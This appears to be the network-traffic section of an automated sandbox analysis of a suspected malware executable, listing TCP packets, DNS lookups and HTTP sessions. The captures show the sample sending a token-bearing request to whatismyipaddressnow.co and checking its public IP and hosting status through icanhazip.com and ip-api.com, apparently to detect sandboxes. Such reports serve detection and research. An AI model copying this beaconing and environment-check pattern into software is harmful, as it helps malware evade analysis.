                                                                                              May 8, 2024 13:54:50.033673048 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.033689022 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.033781052 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.033817053 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.033824921 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.033832073 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.033870935 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.034610033 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.034668922 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.034719944 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.034727097 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.035228014 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.035260916 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.035284996 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.035291910 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.035350084 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.036130905 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.086850882 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.086860895 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.133727074 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.204844952 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.204910994 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.205030918 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.205048084 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.205475092 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.205514908 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.205528021 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.205535889 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.205574989 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.206059933 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.206120014 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.206165075 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.206171989 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.206993103 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.207026005 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.207051992 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.207058907 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.207118988 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.207124949 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.207889080 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.207922935 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.207945108 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.207952023 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.208003998 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.208010912 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.208842993 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.208874941 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.208888054 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.208895922 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.208930016 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.208937883 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.209731102 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.209758997 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.209775925 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.209781885 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.209820032 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.209826946 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.210627079 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.210697889 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.210705042 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.258738041 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.258759022 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.305634975 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.376770973 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.376781940 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.376854897 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.377023935 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.377029896 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.377068996 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.377083063 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.377650023 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.377655983 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.377722025 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.378380060 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.378386021 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.378441095 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.379345894 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.379352093 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.379420042 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.379431009 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.379451990 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.379498005 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.380270004 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.380302906 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.380309105 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.380316019 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.380357027 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.381153107 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.381207943 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.382086039 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.382134914 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.382937908 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.382987022 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.383811951 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.383867025 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.383868933 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.383881092 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.383949041 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.384772062 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.384840965 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.385608912 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.385664940 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.385678053 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.385721922 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.386595011 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.386627913 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.386646032 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.386658907 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.386670113 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.387490988 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.387526989 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.387532949 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.387540102 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.387583971 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.387602091 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.388434887 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.388480902 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.389385939 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.389420986 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.389436007 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.389441967 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.389458895 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.389482975 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.548918009 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.549014091 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.549165010 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.549218893 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.549417019 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.549468040 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.550144911 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.550228119 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.550477982 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.550523043 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.551273108 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.551330090 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.552145958 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.552222967 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.553087950 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.553122997 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.553138971 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.553150892 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.553205967 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.554030895 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.554095030 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.554902077 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.554956913 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.555803061 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.555852890 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.556732893 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.556783915 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.557636976 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.557692051 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.557693005 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.557706118 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.557734013 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.557750940 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.560439110 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.560446024 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.560502052 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.560527086 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.560535908 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.560589075 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.560620070 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.562129974 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.562194109 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.562201977 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.562207937 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.562256098 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.563110113 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.563162088 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.564007044 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.564074039 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.564870119 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.564905882 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.564920902 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.564933062 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.564970016 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.565609932 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.565644979 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.565666914 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.565674067 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.565713882 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.567385912 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.567447901 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.567476034 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.567485094 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.567492962 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.568346024 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.568413019 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.568420887 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.569364071 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.569411993 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.569418907 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.569473982 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.572380066 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.572449923 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.574717999 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.574759007 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.574770927 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.574789047 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.574800968 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.574811935 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.574825048 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.574827909 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.574866056 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.574872971 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.574912071 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.575644970 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.575712919 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.722559929 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.722614050 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.722732067 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.722754955 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.722769022 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.723351002 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.723403931 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.723412991 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.723452091 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.723467112 CEST44349730172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:50.723510981 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:50.732775927 CEST49730443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:51.471180916 CEST4973180192.168.2.4104.16.184.241
                                                                                              May 8, 2024 13:54:51.633924007 CEST8049731104.16.184.241192.168.2.4
                                                                                              May 8, 2024 13:54:51.634008884 CEST4973180192.168.2.4104.16.184.241
                                                                                              May 8, 2024 13:54:51.634226084 CEST4973180192.168.2.4104.16.184.241
                                                                                              May 8, 2024 13:54:51.797527075 CEST8049731104.16.184.241192.168.2.4
                                                                                              May 8, 2024 13:54:51.804527998 CEST8049731104.16.184.241192.168.2.4
                                                                                              May 8, 2024 13:54:51.852458954 CEST4973180192.168.2.4104.16.184.241
                                                                                              May 8, 2024 13:54:52.770633936 CEST4973180192.168.2.4104.16.184.241
                                                                                              May 8, 2024 13:54:52.933214903 CEST8049731104.16.184.241192.168.2.4
                                                                                              May 8, 2024 13:54:52.933289051 CEST4973180192.168.2.4104.16.184.241
                                                                                              May 8, 2024 13:54:52.938752890 CEST4973280192.168.2.4208.95.112.1
                                                                                              May 8, 2024 13:54:53.101005077 CEST8049732208.95.112.1192.168.2.4
                                                                                              May 8, 2024 13:54:53.101201057 CEST4973280192.168.2.4208.95.112.1
                                                                                              May 8, 2024 13:54:53.101391077 CEST4973280192.168.2.4208.95.112.1
                                                                                              May 8, 2024 13:54:53.263643980 CEST8049732208.95.112.1192.168.2.4
                                                                                              May 8, 2024 13:54:53.305603981 CEST4973280192.168.2.4208.95.112.1
                                                                                              May 8, 2024 13:54:53.789321899 CEST4973280192.168.2.4208.95.112.1
                                                                                              May 8, 2024 13:54:53.789948940 CEST49733443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:53.789992094 CEST44349733172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:53.790065050 CEST49733443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:53.795180082 CEST49733443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:53.795198917 CEST44349733172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:53.951270103 CEST8049732208.95.112.1192.168.2.4
                                                                                              May 8, 2024 13:54:53.951334000 CEST4973280192.168.2.4208.95.112.1
                                                                                              May 8, 2024 13:54:54.128685951 CEST44349733172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:54.128765106 CEST49733443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:54.130456924 CEST49733443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:54.130475998 CEST44349733172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:54.130706072 CEST44349733172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:54.137742043 CEST49733443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:54.137882948 CEST49733443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:54.137913942 CEST44349733172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:56.148678064 CEST44349733172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:56.148740053 CEST44349733172.67.143.245192.168.2.4
                                                                                              May 8, 2024 13:54:56.148807049 CEST49733443192.168.2.4172.67.143.245
                                                                                              May 8, 2024 13:54:56.149558067 CEST49733443192.168.2.4172.67.143.245

                                                                                              UDP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              May 8, 2024 13:54:48.452960014 CEST6094253192.168.2.41.1.1.1
                                                                                              May 8, 2024 13:54:48.621728897 CEST53609421.1.1.1192.168.2.4
                                                                                              May 8, 2024 13:54:51.304332018 CEST5702553192.168.2.41.1.1.1
                                                                                              May 8, 2024 13:54:51.468465090 CEST53570251.1.1.1192.168.2.4
                                                                                              May 8, 2024 13:54:51.824562073 CEST6320353192.168.2.41.1.1.1
                                                                                              May 8, 2024 13:54:51.988356113 CEST53632031.1.1.1192.168.2.4
                                                                                              May 8, 2024 13:54:52.772872925 CEST6127753192.168.2.41.1.1.1
                                                                                              May 8, 2024 13:54:52.935771942 CEST53612771.1.1.1192.168.2.4

                                                                                              DNS Queries

                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                              May 8, 2024 13:54:48.452960014 CEST192.168.2.41.1.1.10xae06Standard query (0)whatismyipaddressnow.coA (IP address)IN (0x0001)false
                                                                                              May 8, 2024 13:54:51.304332018 CEST192.168.2.41.1.1.10xaddStandard query (0)icanhazip.comA (IP address)IN (0x0001)false
                                                                                              May 8, 2024 13:54:51.824562073 CEST192.168.2.41.1.1.10x5397Standard query (0)114.82.9.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                              May 8, 2024 13:54:52.772872925 CEST192.168.2.41.1.1.10x93aaStandard query (0)ip-api.comA (IP address)IN (0x0001)false

                                                                                              DNS Answers

                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                              May 8, 2024 13:54:48.621728897 CEST1.1.1.1192.168.2.40xae06No error (0)whatismyipaddressnow.co172.67.143.245A (IP address)IN (0x0001)false
                                                                                              May 8, 2024 13:54:48.621728897 CEST1.1.1.1192.168.2.40xae06No error (0)whatismyipaddressnow.co104.21.71.78A (IP address)IN (0x0001)false
                                                                                              May 8, 2024 13:54:51.468465090 CEST1.1.1.1192.168.2.40xaddNo error (0)icanhazip.com104.16.184.241A (IP address)IN (0x0001)false
                                                                                              May 8, 2024 13:54:51.468465090 CEST1.1.1.1192.168.2.40xaddNo error (0)icanhazip.com104.16.185.241A (IP address)IN (0x0001)false
                                                                                              May 8, 2024 13:54:51.988356113 CEST1.1.1.1192.168.2.40x5397Name error (3)114.82.9.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                              May 8, 2024 13:54:52.935771942 CEST1.1.1.1192.168.2.40x93aaNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false

                                                                                              HTTP Request Dependency Graph

                                                                                              • whatismyipaddressnow.co
                                                                                              • icanhazip.com
                                                                                              • ip-api.com

                                                                                              HTTP Packets

                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.449731104.16.184.241806516C:\Users\user\Desktop\14posdLrGh.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              May 8, 2024 13:54:51.634226084 CEST63OUTGET / HTTP/1.1
                                                                                              Host: icanhazip.com
                                                                                              Connection: Keep-Alive
                                                                                              May 8, 2024 13:54:51.804527998 CEST535INHTTP/1.1 200 OK
                                                                                              Date: Wed, 08 May 2024 11:54:51 GMT
                                                                                              Content-Type: text/plain
                                                                                              Content-Length: 13
                                                                                              Connection: keep-alive
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Access-Control-Allow-Methods: GET
                                                                                              Set-Cookie: __cf_bm=ftf7jC.blgeDF2kwLAOozIxlqqL1Z5477QH2x8dE7Ms-1715169291-1.0.1.1-G6UafwaVE8JQVMHDhEzSw8NXx0QIfF3OofnKFlCa_55OG.XcUA25cfCmcuXIh465HgG5gFTw5QQbwtAj5lUlWg; path=/; expires=Wed, 08-May-24 12:24:51 GMT; domain=.icanhazip.com; HttpOnly
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 880941e93ca87690-SEA
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              Data Raw: 38 31 2e 31 38 31 2e 36 30 2e 39 32 0a
                                                                                              Data Ascii: 81.181.60.92


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              1192.168.2.449732208.95.112.1806516C:\Users\user\Desktop\14posdLrGh.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              May 8, 2024 13:54:53.101391077 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                                                                              Host: ip-api.com
                                                                                              Connection: Keep-Alive
                                                                                              May 8, 2024 13:54:53.263643980 CEST174INHTTP/1.1 200 OK
                                                                                              Date: Wed, 08 May 2024 11:54:52 GMT
                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                              Content-Length: 5
                                                                                              Access-Control-Allow-Origin: *
                                                                                              X-Ttl: 60
                                                                                              X-Rl: 44
                                                                                              Data Raw: 74 72 75 65 0a
                                                                                              Data Ascii: true


                                                                                              HTTPS Proxied Packets

                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.449730172.67.143.2454436516C:\Users\user\Desktop\14posdLrGh.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-05-08 11:54:49 UTC125OUTGET /API/FETCH/filter.php?countryid=14&token=KdudHBIkdYW9 HTTP/1.1
                                                                                              Host: whatismyipaddressnow.co
                                                                                              Connection: Keep-Alive
                                                                                              2024-05-08 11:54:50 UTC609INHTTP/1.1 200 OK
                                                                                              Date: Wed, 08 May 2024 11:54:49 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Vary: Accept-Encoding
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bSZL51yEYNWYCJYaeiZB05PQqTquwTmcTYIKX2jp3dYbXWfv8fE5EBaCMcxqBtYGvkIg8zYOpygFkp3ByWDZAySoFpWrrny%2FismfKuqCPlgRuMo%2Bu1yC8ED3TqvtM9Ac9hC3OUMogeYgdw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 880941d9ddd327e2-SEA
                                                                                              alt-svc: h3=":443"; ma=86400
